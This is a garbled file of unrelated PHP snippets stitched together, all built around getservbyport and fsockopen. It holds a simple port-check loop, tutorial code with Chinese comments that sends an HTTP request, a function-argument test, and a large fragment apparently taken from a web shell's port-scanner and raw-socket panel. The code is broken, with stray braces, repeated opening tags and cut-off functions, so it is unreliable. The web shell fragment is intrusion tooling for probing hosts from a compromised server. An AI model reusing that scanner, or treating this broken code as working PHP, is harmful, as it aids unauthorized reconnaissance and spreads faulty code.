function getService($port, $protocol = "tcp")
{
return @getservbyport($port, $protocol);
}
<?php
$host = 'cipldev.com';
//$host = 'cipldev.com';
$ports = array(21, 25, 80, 81, 110, 443, 3306, 465, 587);
foreach ($ports as $port)
{
$connection = @fsockopen($host, $port);
if (is_resource($connection))
{
echo '<h2>' . $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</h2>' . "\n";
fclose($connection);
}
else
{
echo '<h2>' . $host . ':' . $port . ' is not responding.</h2>' . "\n";
}
}
}
$_POST['dxportscan']['ports'] = implode(',', $_POST['dxportscan']['ports']);
}
print "\n" . '<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
list($usec, $sec) = explode(' ', microtime());
$start = (double) $usec + (double) $sec;
for ($i = 0; $i < count($TOSCAN); $i++) {
$cur_port =& $TOSCAN[$i];
$fp = @fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (double) $_POST['dxportscan']['timeout']);
if ($fp) {
$OKAY_PORTS++;
$port_name = '';
if (isset($DEF_PORTS[$cur_port])) {
$port_name = $DEF_PORTS[$cur_port];
}
print "\n" . '<tr><td width=50 class=listing style="text-align:right;">' . $cur_port . '</td><td class=listing>' . $port_name . '</td><td class=listing>' . getservbyport($cur_port, 'tcp') . '</td></tr>';
}
}
list($usec, $sec) = explode(' ', microtime());
$end = (double) $usec + (double) $sec;
print "\n" . '</table>';
print "\n" . '<font class="highlight_txt">Scanned ' . count($TOSCAN) . ', ' . $OKAY_PORTS . ' opened. Time: ' . ($end - $start) . '</font>';
print "\n" . '<br><hr>' . "\n";
}
print "\n" . '<form action="' . DxURL('leave', '') . '" method=POST>';
print "\n" . '<table border=0>' . '<tr>' . '<td colspan=2>' . '<input type=text name="dxportscan[host]" value="' . (isset($_POST['dxportscan']['host']) ? $_POST['dxportscan']['host'] . '"' : '127.0.0.1"') . ' SIZE=30>' . '<input type=text name="dxportscan[timeout]" value="' . (isset($_POST['dxportscan']['timeout']) ? $_POST['dxportscan']['timeout'] . '"' : '0.1"') . ' SIZE=10>' . '</tr><tr>' . '<td><textarea name="dxportscan[ports]" rows=3 cols=50>' . (isset($_POST['dxportscan']['ports']) ? $_POST['dxportscan']['ports'] : '21-25,35,80,3306') . '</textarea>' . '</td><td>' . '<input type=checkbox name="dxportscan[ports]" value="#default"><a ' . DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300) . ' href="' . DxURL('kill', 'dxparam') . '&dxparam=main_legend">#Scan main</a>' . '<br><input type=submit value="Scan" class="submit" style="width:100pt;">' . '</tr></table></form>';
}
########
######## Raw s0cket
########
if ($_GET['dxmode'] == 'SOCK') {
function get_port_with_service($port, $proto)
{
if (!$port) {
return '';
}
$service = getservbyport($port, $proto);
$portstr = "";
if ($service) {
$portstr = sprintf('<span title="Service %s/%s: %s">' . htmlspecialchars($port) . '</span>', $port, $proto, $service);
} else {
$portstr = htmlspecialchars($port);
}
return ':' . $portstr;
}
<?php
/**
* Created by PhpStorm.
* User: tuyoo
* Date: 15/8/4
* Time: 下午5:33
*/
echo "http's default port is" . getservbyname('http', 'tcp');
//or udp
echo "port 80's default service is" . getservbyport(80, 'tcp');
<?php
// getservbyname(服务名,'tcp/udp') 通过服务名获得端口号
echo "HTTP`s default port number is:" . getservbyname("http", 'tcp');
echo '<hr>';
// getservbyport(端口号,'tcp/udp') 通过端口号获得服务名
echo "Port 80`s default service is:" . getservbyport(80, 'tcp');
echo '<hr>';
// fsockopen() 函数在端口port上建立与target所表示资源的连接
// 在端口 80 上与www.apetdog.com建立连接
$http = fsockopen("www.paiduoge.com", 80);
// 给服务器发送一个请求
$req = "GET / HTTP/1.1\r\n";
$req .= "Host:www.paiduoge.com\r\n";
$req .= "Connection:Close\r\n\r\n";
// fputs() 写入文件,可用于二进制文件
fputs($http, $req);
// 输出请求结果
// feof()测试文件指针是否到了文件结束的位置 fopen()或fsockopen()
while (!feof($http)) {
echo fgets($http, 1024);
}
// 关闭连接
fclose($http);
<?php $port = 80; $protocol = "tcp"; $extra_arg = 12; var_dump(getservbyport($port, $protocol, $extra_arg)); var_dump(getservbyport($port));
